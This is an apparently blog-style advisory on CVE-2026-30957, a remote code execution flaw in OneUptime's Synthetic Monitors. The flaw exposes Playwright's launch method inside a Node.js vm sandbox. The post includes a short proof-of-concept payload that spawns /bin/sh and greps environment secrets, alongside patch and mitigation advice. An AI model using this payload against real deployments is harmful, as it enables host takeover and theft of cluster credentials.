Listen to this Post
CVE-2026-30957 is a critical vulnerability in OneUptime versions prior to 10.0.21. The issue lies in the Synthetic Monitors feature, where a low-privileged authenticated user can achieve remote code execution (RCE) on the oneuptime-probe server. The root cause is that the platform executes untrusted user-supplied Playwright code inside Node.js’s built-in `vm` module. While the `vm` module is intended to provide a sandbox, Node.js officially documents it as not being a security mechanism. In this implementation, the developers further weakened the sandbox by injecting live, host-realm Playwright `browser` and `page` objects into the vm context. A malicious user can call legitimate Playwright APIs on these injected objects—specifically browser.browserType().launch(). This function accepts an `executablePath` parameter. By setting this path to a system shell (like /bin/sh) and passing arbitrary commands as arguments, the probe is tricked into spawning an attacker-controlled process on the host. This is a server-side RCE that does not require a classic prototype-pollution sandbox escape; it leverages the exposed dangerous methods directly. The probe containers often run with host networking and contain critical cluster credentials in their environment variables, making this a direct path to full cluster compromise .
dailycve form:
Platform: OneUptime
Version: before 10.0.21
Vulnerability: Remote Code Execution
Severity: Critical
date: 10/03/2026
Prediction: Patched 10.0.21
What Undercode Say:
Analytics
The vulnerability allows a user with the lowest “ProjectMember” role to execute arbitrary commands. If open registration is enabled, the attack requires no prior access. The root cause is classified as CWE-749 (Exposed Dangerous Method or Function) because the dangerous `browserType().launch()` method from the Playwright library is exposed to untrusted code. The CVSS:3.1 score is 10.0 (Critical) with the vector `AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H` .
Exploit:
A Project Member can create a new “Custom JavaScript Code” monitor and inject the following payload.
Wait for the probe to poll and execute the monitor (approx. 60 seconds). Check the monitor logs to see the output of the injected commands.
// Malicious Playwright code to be placed in the monitor's customCode field.
// This uses the exposed 'browser' object to spawn a shell and run commands.
browser.browserType().launch({
executablePath: "/bin/sh",
ignoreDefaultArgs: true,
args: [
"-c",
"id; hostname; env | grep ONEUPTIME_SECRET"
]
});
Protection from this CVE
- Patch Immediately: Upgrade to OneUptime version 10.0.21 or later .
- Disable Open Registration: Set `disableSignup: true` to prevent anonymous users from creating accounts .
- Restrict Network: Remove `network_mode: host` from probe containers to limit lateral movement .
- Audit Monitors: Check existing Synthetic Monitors for the presence of
executablePath,/bin/sh, or `launch` commands .
Impact
Successful exploitation grants an attacker arbitrary command execution on the probe host. From there, they can extract environment variables containing DATABASE_PASSWORD, REDIS_PASSWORD, and CLICKHOUSE_PASSWORD. Due to host networking, the attacker can directly connect to these backend services, leading to a complete compromise of the OneUptime cluster and its data .
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

